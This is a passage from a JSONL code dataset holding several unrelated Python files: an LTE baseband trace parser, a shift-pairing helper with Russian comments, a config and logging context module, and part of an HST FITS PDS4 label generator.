"django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "479311741", "text": "#coding:utf-8\n__author__ = \"Yulin Cui\"\n__version__ = \"1.0\"\n#to do list\n\"\"\"\n1. Add trouble shoot function, define a function, use this function to print different level of log printout.\n2. Convert one set of printout as data frame\n\"\"\"\n\n\nimport re\nimport sys\n#import simplejson\nimport json\nfrom tqdm import tqdm\n\n\ndef count_line(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n #print (\"method4 line number is: \" + str(i+1))\n return i + 1\n\n#if sys.argv[0] in dir():\n# try:\n# with open('C:/Users/eyulcui/Dropbox/LearnPython/raw_log/typical_trace.txt') as file:\n# input_file = file\n# pass\n# except IOError as e:\n# print (\"Unable to open file, file not exist\") #Does not exist OR no read permissions\n#else:\n# print(\"\\nUsage:\\nscan_baseband_traces_hs_ue.pl \\n\", end=\"\") #by default, print will change line, give change end symbol to none\n# print(\"\\nScript scans content of these traces for FOE:\\n\", end=\"\")\n# print(\"mtd peek -ta UpUlL1PeMasterFt -sig LPP_UP_ULL1PE_EI_DATA_IND\\n\", end=\"\")\n# print(\"lhsh gcpu00512 te e trace5 UpUlL1PeSlaveBl_Spucch\\n\", end=\"\")\n# print(\"\\n -b bbueref Search for a specific bbueref\", end=\"\")\n# print(\"\\n\", end=\"\")\n# sys.exit(0)\n\n\nstateMachine = [0,0,0]\n#[0] is search indication, others to be defined\ncurrentTiming = 0\nlastBFN = 0\nwrappedBfnSub = 0\ncurrentBFN = 0\ncurrentSF = 0\nfp = open('msg2.json', 'w')\n\nlogname = \"C:/Users/eyulcui/Dropbox/Python_CATM/capture_lienb2466.dec\"\nstart_line_number = 0\ntotal_line = count_line(logname)\n#keyMsg = \"UPC_DLMACCE_FI_SCHEDULE_RA_MSG2_REQ\"\n\n\nprint (\"Total line number for this log file is: \" + str(total_line) + \"\\n\", end=\"\")\nprint (\"bfn+sf;cellId;nrOfPreambles;bbueref;preambleId;timingOffset;preamblePower;freqOffEstPrach;\\n\", end=\"\")\n\nwith open(logname) as input_file:\n progress_bar_file = tqdm(input_file,total=total_line)\n#with open('C:/Users/eyulcui/Dropbox/LearnPython/raw_log/typical_trace.txt') as input_file:\n#with open('C:\\STUDY/Dropbox/LearnPython/raw_log/typical_trace.txt') as input_file:\n for eachLine in progress_bar_file:\n\n start_line_number += 1\n if \"LPP_UP_ULCELLPE_CI_SCHEDULE_RA_RESPONSE_IND\" in eachLine:\n searchObj_Msg2 = re.compile(r'.*bfn:(\\d*).*sf:(\\d*).*LPP_UP_ULCELLPE_CI_SCHEDULE_RA_RESPONSE_IND', re.M | re.I)\n\n if searchObj_Msg2.search(eachLine):\n currentBFN = int(searchObj_Msg2.search(eachLine).group(1))\n currentSF = int(searchObj_Msg2.search(eachLine).group(2))\n currentTiming = currentBFN*10 + currentSF\n if currentTiming + 20000 < lastBFN:\n wrappedBfnSub = wrappedBfnSub + 1\n lastBFN = currentTiming\n printBfnSub = wrappedBfnSub * 40960 + currentTiming\n stateMachine[0] = 1\n #print (printBfnSub)\n #print (searchObj.group(0))\n\n#Below are very bad example, very slow compare to above method, each regex rearch will cause around 2 seconds, well find function only need 0.2 second\n# searchObj_Msg2 = re.compile(r'.*bfn:(\\d*).*sf:(\\d*).*LPP_UP_ULCELLPE_CI_SCHEDULE_RA_RESPONSE_IND', re.M | re.I)\n# if searchObj_Msg2.search(eachLine):\n# currentBFN = int(searchObj_Msg2.search(eachLine).group(1))\n# currentSF = int(searchObj_Msg2.search(eachLine).group(2))\n# currentTiming = currentBFN*10 + currentSF\n# if currentTiming + 20000 < lastBFN:\n# wrappedBfnSub = wrappedBfnSub + 1\n# lastBFN = currentTiming\n# printBfnSub = wrappedBfnSub * 40960 + currentTiming\n# stateMachine[0] = 1\n# #print (printBfnSub)\n# #print (searchObj.group(0))\n\n elif stateMachine[0] == 1:\n searchObj_Msg2_cellId = re.compile(r'.*cellId (\\S*),', re.M | re.I)\n searchObj_Msg2_nrOfPreambles = re.compile(r'.*nrOfPreambles (\\S*),', re.M | re.I)\n searchObj_Msg2_subframeRach = re.compile(r'.*subframeRach (\\S*),', re.M | re.I)\n searchObj_Msg2_sfnRach = re.compile(r'.*sfnRach (\\S*),', re.M | re.I)\n\n\n if searchObj_Msg2_cellId.search(eachLine):\n cellId = int(searchObj_Msg2_cellId.search(eachLine).group(1))\n stateMachine[1] = cellId\n\n elif searchObj_Msg2_nrOfPreambles.search(eachLine):\n nrOfPreambles = int(searchObj_Msg2_nrOfPreambles.search(eachLine).group(1))\n if nrOfPreambles > 0:\n stateMachine[2] = 1\n else:\n stateMachine = [0,0,0]\n\n elif searchObj_Msg2_subframeRach.search(eachLine):\n subframeRach = int(searchObj_Msg2_subframeRach.search(eachLine).group(1))\n\n elif searchObj_Msg2_sfnRach.search(eachLine):\n sfnRach = int(searchObj_Msg2_sfnRach.search(eachLine).group(1))\n\n\n if stateMachine[0] == 1 and stateMachine[2] ==1:\n searchObj_Msg2_bbUeRef = re.compile(r'.*bbUeRef (\\S*),', re.M | re.I)\n searchObj_Msg2_preambleId = re.compile(r'.*preambleId (\\S*),', re.M | re.I)\n searchObj_Msg2_timingOffset = re.compile(r'.*timingOffset (\\S*),', re.M | re.I)\n searchObj_Msg2_preamblePower = re.compile(r'.*preamblePower (\\S*),', re.M | re.I)\n searchObj_Msg2_freqOffEstPrach = re.compile(r'.*freqOffEstPrach (\\S*),', re.M | re.I)\n\n if searchObj_Msg2_bbUeRef.search(eachLine):\n bbUeRef = int(searchObj_Msg2_bbUeRef.search(eachLine).group(1))\n\n elif searchObj_Msg2_preambleId.search(eachLine):\n preambleId = int(searchObj_Msg2_preambleId.search(eachLine).group(1))\n\n elif searchObj_Msg2_timingOffset.search(eachLine):\n timingOffset = int(searchObj_Msg2_timingOffset.search(eachLine).group(1))\n\n elif searchObj_Msg2_preamblePower.search(eachLine):\n preamblePower = int(searchObj_Msg2_preamblePower.search(eachLine).group(1))\n\n elif searchObj_Msg2_freqOffEstPrach.search(eachLine):\n freqOffEstPrach = int(searchObj_Msg2_freqOffEstPrach.search(eachLine).group(1))\n stateMachine = [0,0,0]\n msg2_output = [printBfnSub,cellId,nrOfPreambles,preambleId,timingOffset,preamblePower,freqOffEstPrach]\n json.dump(msg2_output, fp)\n print (str(printBfnSub) + \";\" + str(cellId) + \";\" + str(nrOfPreambles) + \";\" + str(preambleId) + \";\" + str(timingOffset) + \";\" + str(preamblePower) + \";\" + str(freqOffEstPrach) + \";\" + \"\\n\", end=\"\")\n\n\n\n\n\n# print (\"searchObj.group() : \", searchObj.group())\n# print (\"searchObj.group(1) : \", searchObj.group(1))\n# print (\"searchObj.group(2) : \", searchObj.group(2))\n# else:\n# print (\"Nothing found!!\")\n\n\n#[2016-12-01 12:51:54.682170] 0xc5021225=(bfn:3152, sfn:80, sf:2.20, bf:34) duId:1 EMCA1/UpUlCellPeMasterFt_MTD BIN_SEND : LPP_UP_ULCELLPE_CI_SCHEDULE_RA_RESPONSE_IND (775) <= UNKNOWN (sessionRef=0x4)\n#UpUlCellPeCiScheduleRaResponseInd {\n# sigNo 4294901760,\n# cellId 4,\n# subframeRach 1,\n# sfnRach 80,\n# nrOfPreambles 1,\n# padding0 0,\n# rachPreambleArray {\n# rachPreambleArray {\n# preambleId 0,\n# timingOffset 1,\n# preamblePower 4675,\n# sectorId 0,\n# freqOffEstPrach 0,\n# prachCeLevel 1\n# }\n# }\n#}\n\n", "sub_path": "collection/BB_trace_handling_catm.py", "file_name": "BB_trace_handling_catm.py", "file_ext": "py", "file_size_in_byte": 7438, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tqdm.tqdm", "line_number": 61, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 68, "usage_type": "call"}, {"api_name": "re.M", "line_number": 68, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 68, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 97, "usage_type": "call"}, {"api_name": "re.M", "line_number": 97, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 97, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 98, "usage_type": "call"}, {"api_name": "re.M", "line_number": 98, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 98, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 99, "usage_type": "call"}, {"api_name": "re.M", "line_number": 99, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 99, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 100, "usage_type": "call"}, {"api_name": "re.M", "line_number": 100, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 100, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 122, "usage_type": "call"}, {"api_name": "re.M", "line_number": 122, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 122, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 123, "usage_type": "call"}, {"api_name": "re.M", "line_number": 123, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 123, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 124, "usage_type": "call"}, {"api_name": "re.M", "line_number": 124, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 124, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 125, "usage_type": "call"}, {"api_name": "re.M", "line_number": 125, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 125, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 126, "usage_type": "call"}, {"api_name": "re.M", "line_number": 126, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 126, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 144, "usage_type": "call"}]} +{"seq_id": "399294989", "text": "from itertools import combinations, chain\nfrom collections import Counter\n\ndef generation_list(total_person):\n \"\"\"Создает список человек\"\"\"\n return [x + 1 for x in range(total_person)]\n\ndef count_elements(general_list, list_of_elements):\n \"\"\"Считает количество переданных элементов в списке\"\"\"\n count = Counter(general_list)\n res = {i: count[i] for i in list_of_elements}\n return res\n\ndef paring(roll, count_in_pair = 2):\n \"\"\"Составляет все пары для списка\n (также можно использовать для генерации любых других\n сочетаний указ��вая второй параметр)\"\"\"\n return list(combinations(roll, count_in_pair))\n\ndef find_pairs(schedule):\n \"\"\"Функция составляет пары для каждой смены в переданном расписании\"\"\"\n return [paring(shift) for shift in schedule]\n\ndef concatenate_lists(lists):\n \"\"\"Функция сцкпляет несколько списков в один\"\"\"\n return list(chain(*lists))\n\nif __name__ == '__main__':\n \"\"\"Исключительно для теста модуля\"\"\"\n schedule = [\n (1, 2, 3, 6, 7, 8),\n (1, 2, 4, 5, 7, 9),\n (1, 3, 5, 6, 9, 10),\n (2, 4, 6, 7, 8, 10),\n (3, 4, 5, 6, 8, 9)]\n # Общее кол-во людей\n number_of_people = 10\n # Кол-во людей в смене\n people_in_shift = 6\n # Список ID охранников\n list_people = generation_list(number_of_people)\n # Все возможные смены\n all_shifts = paring(list_people, people_in_shift)\n # Все пары\n all_pairs = paring(list_people)\n # Пары для каждой смены\n couples_in_shifts = find_pairs(schedule)\n # Количество встреч каждой из пар в расписании\n number_of_meetings = count_elements(concatenate_lists(couples_in_shifts), all_pairs)\n\n print(\n f'number_of_people:{number_of_people}\\n'\n f'people_in_shift:{people_in_shift}\\n'\n f'list_people:{list_people}\\n'\n f'schedule:{schedule}\\n'\n # f'couples_in_shifts:{couples_in_shifts}\\n'\n # f'all_shifts:{all_shifts}\\n'\n # f'all_pairs:{all_pairs}\\n'\n f'number_of_meetings:{number_of_meetings}\\n'\n )\n", "sub_path": "Test and create new functions/Схема/functions_for_shifts.py", "file_name": "functions_for_shifts.py", "file_ext": "py", "file_size_in_byte": 2394, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.Counter", "line_number": 10, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 18, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "231038576", "text": "import logging\nimport torch as t\n\nfrom singleton_decorator import singleton\nfrom main.common.configuration import Configuration\nfrom main.common.logger import Logger\n\n\nctx = globals()\n\n@singleton\nclass AppContext(object):\n\n def __init__(self, conf_file=None):\n if conf_file is None:\n conf_file = 'main/conf/config.yml'\n\n self.conf = Configuration(conf_file)\n\n if self.conf.get('logging:enable') is True:\n log_dir = self.conf.get('logging:conf-file', 'main/conf/logging.yml')\n Logger(log_dir)\n else:\n logging.basicConfig(level=logging.DEBUG)\n\n ctx['conf'] = self.conf\n\ndef cuda(tensor, device=None):\n if device is None:\n device = ctx['conf'].get('device')\n if device is None:\n device = t.device('cuda' if t.cuda.is_available() else 'cpu')\n else:\n device = t.device(device)\n\n return tensor.to(device)\n\ndef logger(self):\n return logging.getLogger(self.__class__.__name__)\n\ndef conf(key=None, default=None):\n if key is None:\n return ctx['conf']\n return ctx['conf'].get(key, default)\n", "sub_path": "main/common/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 1126, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "main.common.configuration.Configuration", "line_number": 18, "usage_type": "call"}, {"api_name": "main.common.logger.Logger", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 24, "usage_type": "attribute"}, {"api_name": "singleton_decorator.singleton", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "569018351", "text": "\"\"\"\nFunctionality to create a label for a data product containing a single\nFITS file.\n\"\"\"\nfrom typing import Any, Dict, Generator, List, Optional, Tuple, cast\nimport os.path\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom pdart.db.bundle_db import BundleDB\nfrom pdart.db.sql_alch_tables import File, OtherCollection\nfrom pdart.labels.file_contents import get_file_contents\nfrom pdart.labels.lookup import (\n CARD_SET,\n DictLookup,\n Lookup,\n MultiDictLookup,\n make_hdu_lookups,\n)\nfrom pdart.labels.fits_product_label_xml import (\n make_data_label,\n make_misc_label,\n mk_Investigation_Area_lidvid,\n mk_Investigation_Area_name,\n)\nfrom pdart.labels.hst_parameters import (\n get_channel_id,\n get_hst_parameters,\n get_start_stop_date_times,\n get_exposure_duration,\n get_instrument_id,\n get_detector_ids,\n get_filter_name,\n)\nfrom pdart.labels.label_error import LabelError\nfrom pdart.labels.observing_system import (\n instrument_host_lidvid,\n observing_system,\n observing_system_lid,\n observing_system_lidvid,\n)\nfrom pdart.labels.investigation_area import investigation_area\nfrom pdart.labels.primary_result_summary import primary_result_summary\nfrom pdart.labels.target_identification import (\n get_target,\n get_target_info,\n create_target_identification_nodes,\n)\nfrom pdart.labels.target_identification_xml import get_target_lid\nfrom pdart.labels.doc_reference_list import make_document_reference_list\n\nfrom pdart.pipeline.suffix_info import ( # type: ignore\n get_titles_format,\n get_ref_suffix,\n TARGET_IDENTIFICATION_SUFFIXES,\n)\n\nfrom pdart.labels.time_coordinates import get_time_coordinates\nfrom pdart.labels.utils import (\n lidvid_to_lid,\n lidvid_to_vid,\n get_current_date,\n MOD_DATE_FOR_TESTESING,\n wavelength_from_range,\n)\nfrom pdart.pds4.lid import LID\nfrom pdart.pds4.lidvid import LIDVID\nfrom pdart.pds4.vid import VID\nfrom pdart.xml.pretty import pretty_and_verify\nfrom pdart.xml.templates import (\n combine_nodes_into_fragment,\n NodeBuilder,\n)\n\nfrom pdart.pipeline.suffix_info import ( # type: ignore\n get_collection_type,\n get_processing_level,\n)\n\nfrom wavelength_ranges import wavelength_ranges # type: ignore\n\n\ndef _directory_siblings(\n working_dir: str, bundle_db: BundleDB, product_lidvid: str\n) -> List[str]:\n # Look in the mastDownload directory and search for the file with\n # the product_lidvid's basename. Then return all its siblings'\n # basenames.\n for dirpath, dirnames, filenames in os.walk(\n os.path.join(working_dir, \"mastDownload\")\n ):\n basename = bundle_db.get_product_file(product_lidvid).basename\n if basename in filenames:\n return sorted(filenames)\n return []\n\n\ndef _raw_sibling_file(siblings: List[str]) -> Tuple[str, str]:\n for suffix in get_ref_suffix():\n sib_file = _sibling_file(siblings, suffix)\n if sib_file:\n return (suffix, sib_file)\n # if the main reference file doesn't exist, we check for alternate\n # reference file and also make sure the ninth character of the basename\n # is between 0~9 when using using alternate reference file.\n for suffix in get_ref_suffix(alt_ref=True):\n sib_file = _sibling_file(siblings, suffix)\n if sib_file:\n return (suffix, sib_file)\n raise RuntimeError(\n f\"Cannot get the reference files. Siblings={siblings};\"\n + f\"REF_SUFFIXES={get_ref_suffix()};\"\n + f\"ALT_REF_SUFFIXES={get_ref_suffix(alt_ref=True)}\"\n )\n\n\ndef _shm_sibling_file(siblings: List[str]) -> Tuple[str, str]:\n for suffix in TARGET_IDENTIFICATION_SUFFIXES:\n sib_file = _sibling_file(siblings, suffix)\n if sib_file:\n return (suffix, sib_file)\n raise RuntimeError(\n f\"siblings={siblings}; SHM_SUFFIXES={TARGET_IDENTIFICATION_SUFFIXES}\"\n )\n\n\ndef _sibling_file(\n siblings: List[str], suffix: str, alt_ref: bool = False\n) -> Optional[str]:\n # Given a list of siblings, return the first one that ends with\n # \"_.fits\".\n ending = f\"_{suffix.lower()}.fits\"\n for basename in siblings:\n if alt_ref:\n ninth_char = basename[basename.rindex(\"_\") - 1]\n if int(ninth_char) not in range(0, 10):\n continue\n if basename.lower().endswith(ending):\n return basename\n return None\n\n\ndef _munge_lidvid(product_lidvid: str, suffix: str, new_basename: str) -> str:\n bundle_id, collection_id, product_id = LIDVID(product_lidvid).lid().parts()\n\n # TODO This is a hack\n collection_type = get_collection_type(suffix=suffix)\n first_underscore_idx = collection_id.index(\"_\")\n new_collection_id = (\n collection_type + collection_id[first_underscore_idx:-3] + suffix.lower()\n )\n # TODO This is a hack\n new_product_id = new_basename[0:9]\n\n new_lid = LID.create_from_parts([bundle_id, new_collection_id, new_product_id])\n # TODO This is a hack. Fix it.\n vid = VID(\"1.0\")\n new_lidvid = LIDVID.create_from_lid_and_vid(new_lid, vid)\n return str(new_lidvid)\n\n\ndef _find_RAWish_lookups(\n bundle_db: BundleDB, product_lidvid: str, file_basename: str, siblings: List[str]\n) -> List[Lookup]:\n # TODO Fix this\n def _find_RAWish_suffix_and_basename() -> Tuple[str, str]:\n return _raw_sibling_file(siblings)\n\n suffix, RAWish_basename = _find_RAWish_suffix_and_basename()\n RAWish_product_lidvid = _munge_lidvid(product_lidvid, suffix, RAWish_basename)\n\n def _find_RAWish_card_dicts() -> CARD_SET:\n card_dicts = bundle_db.get_card_dictionaries(\n RAWish_product_lidvid, RAWish_basename\n )\n return card_dicts\n\n card_dicts = _find_RAWish_card_dicts()\n return make_hdu_lookups(RAWish_basename, card_dicts)\n\n\ndef _find_SHMish_lookup(\n bundle_db: BundleDB, product_lidvid: str, file_basename: str, siblings: List[str]\n) -> Lookup:\n # TODO Fix this\n def _find_SHMish_suffix_and_basename() -> Tuple[str, str]:\n return _shm_sibling_file(siblings)\n\n suffix, SHMish_basename = _find_SHMish_suffix_and_basename()\n SHMish_product_lidvid = _munge_lidvid(product_lidvid, suffix, SHMish_basename)\n\n def _find_SHMish_card_dicts() -> CARD_SET:\n card_dicts = bundle_db.get_card_dictionaries(\n SHMish_product_lidvid, SHMish_basename\n )\n return card_dicts\n\n card_dicts = _find_SHMish_card_dicts()\n return DictLookup(SHMish_basename, card_dicts)\n\n\ndef make_fits_product_label(\n working_dir: str,\n bundle_db: BundleDB,\n collection_lidvid: str,\n product_lidvid: str,\n bundle_lidvid: str,\n file_basename: str,\n verify: bool,\n use_mod_date_for_testing: bool = False,\n) -> bytes:\n try:\n product = bundle_db.get_product(product_lidvid)\n collection = bundle_db.get_collection(collection_lidvid)\n if not isinstance(collection, OtherCollection):\n raise TypeError(f\"{collection} is not OtherCollection.\")\n instrument = collection.instrument\n suffix = collection.suffix\n\n # If a label is created for testing purpose to compare with pre-made XML\n # we will use MOD_DATE_FOR_TESTESING as the modification date.\n if not use_mod_date_for_testing:\n # Get the date when the label is created\n mod_date = get_current_date()\n else:\n mod_date = MOD_DATE_FOR_TESTESING\n\n card_dicts = bundle_db.get_card_dictionaries(product_lidvid, file_basename)\n lookup = DictLookup(file_basename, card_dicts)\n siblings = _directory_siblings(working_dir, bundle_db, product_lidvid)\n hdu_lookups = _find_RAWish_lookups(\n bundle_db, product_lidvid, file_basename, siblings\n )\n shm_lookup = _find_SHMish_lookup(\n bundle_db, product_lidvid, file_basename, siblings\n )\n\n start_date_time, stop_date_time = get_start_stop_date_times(\n hdu_lookups, shm_lookup\n )\n exposure_duration = get_exposure_duration(hdu_lookups, shm_lookup)\n start_stop_times = {\n \"start_date_time\": start_date_time,\n \"stop_date_time\": stop_date_time,\n \"exposure_duration\": exposure_duration,\n }\n\n # Store start/stop time for each fits_product in fits_products table.\n # The min/max will be pulled out for roll-up in data collection/bundle.\n bundle_db.update_fits_product_time(\n product_lidvid, start_date_time, stop_date_time\n )\n\n hst_parameters = get_hst_parameters(hdu_lookups, shm_lookup)\n bundle = bundle_db.get_bundle(bundle_lidvid)\n proposal_id = bundle.proposal_id\n\n investigation_area_name = mk_Investigation_Area_name(proposal_id)\n investigation_area_lidvid = mk_Investigation_Area_lidvid(proposal_id)\n bundle_db.create_context_product(investigation_area_lidvid, \"investigation\")\n bundle_db.create_context_product(instrument_host_lidvid(), \"instrument_host\")\n bundle_db.create_context_product(\n observing_system_lidvid(instrument), \"instrument\"\n )\n\n # Fetch target identifications from db\n target_id = shm_lookup[\"TARG_ID\"]\n target_identifications = bundle_db.get_target_identifications_based_on_id(\n target_id\n )\n\n # At this stage, target identifications should be in the db\n if len(target_identifications) == 0:\n raise ValueError(\"Target identification is not stored in db.\")\n\n target_identification_nodes: List[NodeBuilder] = []\n target_identification_nodes = create_target_identification_nodes(\n bundle_db, target_identifications, \"data\"\n )\n\n # Get wavelength\n instrument_id = get_instrument_id(hdu_lookups, shm_lookup)\n detector_ids = get_detector_ids(hdu_lookups, shm_lookup)\n filter_name = get_filter_name(hdu_lookups, shm_lookup)\n wavelength_range = wavelength_ranges(instrument_id, detector_ids, filter_name)\n bundle_db.update_wavelength_range(product_lidvid, wavelength_range)\n\n # Get title\n channel_id = get_channel_id(hdu_lookups, shm_lookup)\n try:\n titles = get_titles_format(instrument_id, channel_id, suffix)\n product_title = titles[0] + \".\"\n product_title = product_title.format(\n I=instrument_id + \"/\" + channel_id, F=file_basename, P=proposal_id\n )\n collection_title = titles[1] + \".\"\n collection_title = collection_title.format(\n I=instrument_id + \"/\" + channel_id, F=file_basename, P=proposal_id\n )\n # save data/misc collection title to OtherCollection table\n bundle_db.update_fits_product_collection_title(\n collection_lidvid, collection_title\n )\n except KeyError:\n # If product_title doesn't exist in SUFFIX_TITLES, we use the\n # following text as the product_title.\n product_title = (\n f\"{instrument_id} data file {file_basename} \"\n + f\"obtained by the HST Observing Program {proposal_id}.\"\n )\n\n # Dictionary used for primary result summary\n processing_level = get_processing_level(suffix, instrument_id, channel_id)\n primary_result_dict: Dict[str, Any] = {}\n primary_result_dict[\"processing_level\"] = processing_level\n primary_result_dict[\"description\"] = product_title\n primary_result_dict[\"wavelength_range\"] = wavelength_range\n\n # Dictionary passed into templates. Use the same data dictionary for\n # either data label template or misc label template\n data_dict = {\n \"lid\": lidvid_to_lid(product_lidvid),\n \"vid\": lidvid_to_vid(product_lidvid),\n \"title\": product_title,\n \"mod_date\": mod_date,\n \"file_name\": file_basename,\n \"file_contents\": get_file_contents(\n bundle_db, card_dicts, instrument, product_lidvid\n ),\n \"Investigation_Area\": investigation_area(\n investigation_area_name, investigation_area_lidvid, \"data\"\n ),\n \"Observing_System\": observing_system(instrument),\n \"Time_Coordinates\": get_time_coordinates(start_stop_times),\n \"Target_Identification\": combine_nodes_into_fragment(\n target_identification_nodes\n ),\n \"HST\": hst_parameters,\n \"Primary_Result_Summary\": primary_result_summary(primary_result_dict),\n \"Reference_List\": make_document_reference_list([instrument], \"data\"),\n }\n\n # Pass the data_dict to either data label or misc label based on\n # collection_type\n collection_type = get_collection_type(suffix, instrument_id, channel_id)\n if collection_type == \"data\":\n label = make_data_label(data_dict).toxml().encode()\n elif collection_type == \"miscellaneous\":\n label = make_misc_label(data_dict).toxml().encode()\n\n except AssertionError:\n raise AssertionError(\n f\"{product_lidvid} has no target identifications stored in DB.\"\n )\n except Exception as e:\n print(str(e))\n raise LabelError(\n product_lidvid, file_basename, (lookup, hdu_lookups[0], shm_lookup)\n ) from e\n\n return pretty_and_verify(label, verify)\n", "sub_path": "pdart/labels/fits_product_label.py", "file_name": "fits_product_label.py", "file_ext": "py", "file_size_in_byte": 13415, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pdart.db.bundle_db.BundleDB", "line_number": 83, "usage_type": "name"}, {"api_name": "os.path.walk", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 89, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 97, "usage_type": "name"}, {"api_name": "pdart.pipeline.suffix_info.get_ref_suffix", "line_number": 98, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_ref_suffix", "line_number": 105, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_ref_suffix", "line_number": 111, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_ref_suffix", "line_number": 112, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 116, "usage_type": "name"}, {"api_name": "pdart.pipeline.suffix_info.TARGET_IDENTIFICATION_SUFFIXES", "line_number": 117, "usage_type": "name"}, {"api_name": "pdart.pipeline.suffix_info.TARGET_IDENTIFICATION_SUFFIXES", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 127, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 128, "usage_type": "name"}, {"api_name": "pdart.pds4.lidvid.LIDVID", "line_number": 143, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_collection_type", "line_number": 146, "usage_type": "call"}, {"api_name": "pdart.pds4.lid.LID.create_from_parts", "line_number": 154, "usage_type": "call"}, {"api_name": "pdart.pds4.lid.LID", "line_number": 154, "usage_type": "name"}, {"api_name": "pdart.pds4.vid.VID", "line_number": 156, "usage_type": "call"}, {"api_name": "pdart.pds4.lidvid.LIDVID.create_from_lid_and_vid", "line_number": 157, "usage_type": "call"}, {"api_name": "pdart.pds4.lidvid.LIDVID", "line_number": 157, "usage_type": "name"}, {"api_name": "pdart.db.bundle_db.BundleDB", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 165, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.CARD_SET", "line_number": 171, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.make_hdu_lookups", "line_number": 178, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 163, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.Lookup", "line_number": 163, "usage_type": "name"}, {"api_name": "pdart.db.bundle_db.BundleDB", "line_number": 182, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 182, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 185, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.CARD_SET", "line_number": 191, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.DictLookup", "line_number": 198, "usage_type": "call"}, {"api_name": "pdart.labels.lookup.Lookup", "line_number": 183, "usage_type": "name"}, {"api_name": "pdart.db.bundle_db.BundleDB", "line_number": 203, "usage_type": "name"}, {"api_name": "pdart.db.sql_alch_tables.OtherCollection", "line_number": 214, "usage_type": "argument"}, {"api_name": "pdart.labels.utils.get_current_date", "line_number": 223, "usage_type": "call"}, {"api_name": "pdart.labels.utils.MOD_DATE_FOR_TESTESING", "line_number": 225, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.DictLookup", "line_number": 228, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_start_stop_date_times", "line_number": 237, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_exposure_duration", "line_number": 240, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_hst_parameters", "line_number": 253, "usage_type": "call"}, {"api_name": "pdart.labels.fits_product_label_xml.mk_Investigation_Area_name", "line_number": 257, "usage_type": "call"}, {"api_name": "pdart.labels.fits_product_label_xml.mk_Investigation_Area_lidvid", "line_number": 258, "usage_type": "call"}, {"api_name": "pdart.labels.observing_system.instrument_host_lidvid", "line_number": 260, "usage_type": "call"}, {"api_name": "pdart.labels.observing_system.observing_system_lidvid", "line_number": 262, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 275, "usage_type": "name"}, 